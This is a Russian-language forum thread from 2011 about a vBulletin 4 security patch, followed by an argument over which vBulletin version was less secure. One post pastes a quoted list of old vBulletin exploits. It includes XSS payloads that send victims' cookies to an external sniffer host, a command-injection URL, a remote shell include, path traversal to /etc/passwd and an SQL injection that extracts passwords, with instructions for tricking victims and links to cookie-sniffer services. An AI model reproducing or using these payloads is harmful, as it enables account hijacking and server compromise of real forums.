форум vBSupport.ru > vBSupport.ru > Безопасность
Register Меню vBsupport Изображения Files Manager О рекламе Today's Posts Search
  • Родная гавань
  • Блок РКН снят
  • Premoderation
  • For English speaking users
  • Каталог Фрилансеров
  • If you want to buy some product or script
  • Администраторам
VBsupport перешел с домена .ORG на родной .RU Ура! Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей

Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
for English speaking users:
You may be surprised with restriction of access to the attachments of the forum. The reason is the recent change in vbsupport.org strategy:

- users with reputation < 10 belong to "simple_users" users' group
- if your reputation > 10 then administrator (kerk, Luvilla) can decide to move you into an "improved" group, but only manually

Main idea is to increase motivation of community members to share their ideas and willingness to support to each other. You may write an article for the subject where you are good enough, you may answer questions, you may share vbulletin.com/org content with vbsupport.org users, receiving "thanks" equal your reputation points. We should not only consume, we should produce something.

- you may:
* increase your reputation (doing something useful for another members of community) and being improved
* purchase temporary access to the improved category:
10 $ for 3 months. - this group can download attachments, reputation/posts do not matter.
20 $ for 3 months. - this group can download attachments, reputation/posts do not matter + adds eliminated + Inbox capacity increased + files manager increased permissions.

Please contact kerk or Luvilla regarding payments.

Important!:
- if your reputation will become less then 0, you will be moved into "simple_users" users' group automatically.*
*for temporary groups (pre-paid for 3 months) reputation/posts do not matter.
Уважаемые пользователи!

На форуме открыт новый раздел "Каталог фрилансеров"

и отдельный раздел для платных заказов "Куплю/Закажу"

Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже:
Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота.
Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
 
 
 
 
armagedon_kr
Продвинутый
 
armagedon_kr's Avatar
Default Исправления безопасности для VBulletin 4
7

A recent vBulletin 4 (all versions, Suite & Classic) report indicated that if an installation had been hacked previously, the attacker could hide malicious code to allow a repeated attack. To further strengthen vBulletin’s security - additional security checking and query cleaning were added to thwart such attacks.

The issue does not affect vBulletin 3.x.

To improve the security of your vBulletin 4 installation please download the patch from the members area of vBulletin: http://members.vbulletin.com/
We recommend you install this security patch as soon as possible.

The upgrade process is the same as previous patch level releases - simply download the patch from the Members' Area, extract the files and upload to your webserver, overwriting the existing files. There is no upgrade script required.
Additional Information:

This is an update to the previously fixed "social group search exploit"; this new report indicated that in some cases the attacker was able to leave a backdoor in the database to allow subsequent attacks even after a successful patch-fix. This updated patch will prevent such repeated attacks.

To be precise, this is the file that has been patched: packages/vbforum/search/type/socialgroupmessage.php

примерный перевод такой:
В недавней VBulletin 4 (все версии, Suite & Classic) указано, что в некоторых случаях злоумышленник смог оставить черный ход в базы данных для обеспечения последующих атак, даже после успешного патч-исправление. Это обновленный патч позволит предотвратить такие повторные атаки. Проблема не затрагивает VBulletin 3.x. Для повышения безопасности Вашего VBulletin 4 установки, пожалуйста, скачайте патч с площадки автора: HTTP : / / members.vbulletin.com / Мы рекомендуем установить это обновление как можно скорее. Процесс обновления такая же, как предыдущие релизы уровень патч - просто скачать патч с Площадки, извлечь файлы и загрузить на свой Веб-сервер с перезаписью существующих файлов. Существует не сценарий обновления требуется.

файл, который был исправлен: пакеты /vbforum/search/type/socialgroupmessage.php

armagedon_kr добавил 01.11.2011 в 04:28
простите за корявый перевод

Last edited by armagedon_kr : 11-01-2011 at 06:28 AM. Reason: Добавлено сообщение
Bot
Yandex Bot Yandex Bot is online now
 
Join Date: 05.05.2005
Реклама на форуме А что у нас тут интересного? =)
 
 
Vovan
Специалист
 
Vovan's Avatar
Default
3

Ну и сам файлик
Attached Files
File Type: php socialgroupmessage.php (14.7 KB, 27 views)

Last edited by Vovan : 11-01-2011 at 12:05 PM.
 
 
kerk
k0t
 
kerk's Avatar
Default
0

"шо, опять?! ©"
опять дырка?
 
 
artscripts
Эксперт
 
artscripts's Avatar
Default
1

kerk, НЕ поясничай)) Когда тройка развивалась там дыр было поболее))
 
 
kerk
k0t
 
kerk's Avatar
Default
0

Quote:
Originally Posted by artscripts View Post
дыр было поболее
дыр практически небыло, не надо "ля-ля"
я говорю "практически", потому что недочеты все таки были
но таких косяков, как в 4, разработчики никогда не допускали
здесь же картинка совсем наоборот, форум очень быстро и уверенно превращается в решето
и скоро брэнд "vBulletin", будет в сети ассоциироваться со словами "никогда не ставь это гуано", "дырявый двиг" и подобными...
 
 
armagedon_kr
Продвинутый
 
armagedon_kr's Avatar
Default
0

и хоть бы кто поблагодарил за новость, файлик не смог прикрепить, нет прав:((( хотя всегда помогал, когда время было.
 
 
artscripts
Эксперт
 
artscripts's Avatar
Default
1

armagedon_kr, какие тут благодарности, дай с керком поспорить))

artscripts добавил 01.11.2011 в 13:40
kerk,

Quote:
vBulletin 3.0

3.0.0 - XSS
Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
www.xz.сom/forumpath//search.php?do=process&showposts=0&query=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

3.0-3.0.4 - Выполнение произвольных команд
Описание уязвимости: уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.
Пример:
Код:
www.xz.сom/forumpath/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

О командах читать здесь: http://forum.antichat.ru/threadnav7345-1-10.html

3.0.3–3.0.9 XSS
Описание уязвимости: уязвимость существует при обработке входных данных в поле Статус. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: менять свой статус по умолчанию может только администрация, начиная от группы Модераторы.
Пример:
Код:
<body onLoad=img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>


3.0.9 and 3.5.4 - XSS
Описание уязвимости: звимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
http://www.xz.сom/forumpath/newthrea...me='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%E2%F3%FE+%F2% E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&stickunstick=1&iconid=0




vBulletin 3.5

3.5.2 - XSS
Описание уязвимости: Уязвимость существует при обработке входных данных в поле "title" в сценарии "calendar.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
BODY:---------->No matter
OTHER OPTIONS:->No matter

Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.

3.5.3 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в поле "Email Address" в модуле "Edit Email & Password". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: удачная эксплуатация уязвимости возможна при включенных опциях "Enable Email features" и "Allow Users to Email Other Member".
Пример:
Код:
www.xz.сom/forumpath/profile.php?do=editpassword
pass:your pass
email: vashe@milo.com”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt
Note About lenght limitation
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}

Пояснение: заходим в профиль и в поле email прописываем vashe@milo.com”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt. Cохраняем. Потом ставим в опциях свой емайл видимым для всех. Теперь втравливаем кому нибудь ссылку www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}, где {your id} ваш id. Cookie уйдут на снифер.

3.5.4 - Дамп БД
Описание уязвимости: уязвимость существует из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'. Удаленный пользователь может с помощью специально сформированного URL сделать дамп базы данных приложения.
Пример:
Код:
http://www.xz.com/forumpath/install/...?step=SomeWord


3.5.4 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
www.xz.сom/forumpath/inlinemod.php?do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a





Уязвимости в модулях vBulletin.

vBug Tracker 3.5.1 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "sortorder" сценария vbugs.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
http://www.xz.сom/forumpath/vbugs.ph...3Cscript%3Eimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%3C/script%3E


ImpEx 1.74 - PHP-инклюдинг и выполнение команд
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "systempath" в сценарии ImpExData.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
Код:
(1)
http://www.xz.сom/forumpath/impex/Im...d/r57shell.txt
http://www.xz.сom/forumpath/impex/Im.../../etc/passwd
(2)
http://www.site.com/forum/impex/ImpE...l.com/cmd?&=id
(3)
http://www.site.com/forum/impex/ImpE...l.com/cmd?&=id
(4)
http://www.site.com/forum/impex/ImpE...l.com/cmd?&=id

Exploit: http://www.securitylab.ru/vulnerabil...rce/264410.php

ibProArcade 2.x - SQL injection
Описание уязвимости: Уязвимость существует в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
Пример:
Код:
http://www.xz.сom/forumpath/index.ph...report&user=-1 union select password from user where userid=[any_user]

Где [any_user] id нужного нам юзера.



При использовании XSS c указанным в теме снифером. Логи смотреть тут: http://antichat.ru/sniff/log.php
Но лучше завести себе свой снифер -). Это можно сделать тут: http://antichat.ru/sniffer или тут: http://s.netsec.ru.
Далеко не полный список. Где твои "ля-ля" ?))

Last edited by artscripts : 11-01-2011 at 03:40 PM. Reason: Добавлено сообщение
 
 
Centurion
Эксперт
vBSSecurity
 
Centurion's Avatar
Default
0

artscripts, ну ты нашел что сравнить - "начало движка" и "эволюцию" в лице новой версии, которая должна изначально быть куда лучше и защищенней, чем предыдущие.
 
 
kerk
k0t
 
kerk's Avatar
Default
0

в сравнение нужно приводить именно ДЫРЫ движка, основных файлов форума
почти все перечисленные "уязвимости" - это XSS, т.е. не дыры как таковые, воспользоваться этими "дырками" может далеко не каждый
ibProArcade 2.x - SQL injection
vBug Tracker 3.5.1 - XSS
это вообще к движку не имеет никакого отношения
не будем перечислять все дырявые хаки, их слишком много
дальше...
импекс
рекомендуется удалять после конвертации, если админ этого не сделал, то кто ему доктор?
папка инстал
тоже самое, везде где только можно, твердим одно и то же, удаляйте папку после установки, но никто ж не читает, как и призывы не ставить УГ 4
==
Quote:
Originally Posted by artscripts View Post
Где твои "ля-ля"
они в соотношении количества дыр в четверке и тройке на определенный промежуток времени
четверка ДОЛЖНА быть гораздо более защищенной на основе многолетнего опыта разработки третьей линейки
когда оставили развитие 2-й линейки и начали писать 3-ку, разрабы учитывали свои ошибки
здесь же мы видим решето
 
 
artscripts
Эксперт
 
artscripts's Avatar
Default
0

kerk, Согласен, должны были учитывать, возможно дело в том что поменялись разработчики?
 


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off




All times are GMT +4. The time now is 05:44 PM.


Powered by vBulletin® Version 3.6.0
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.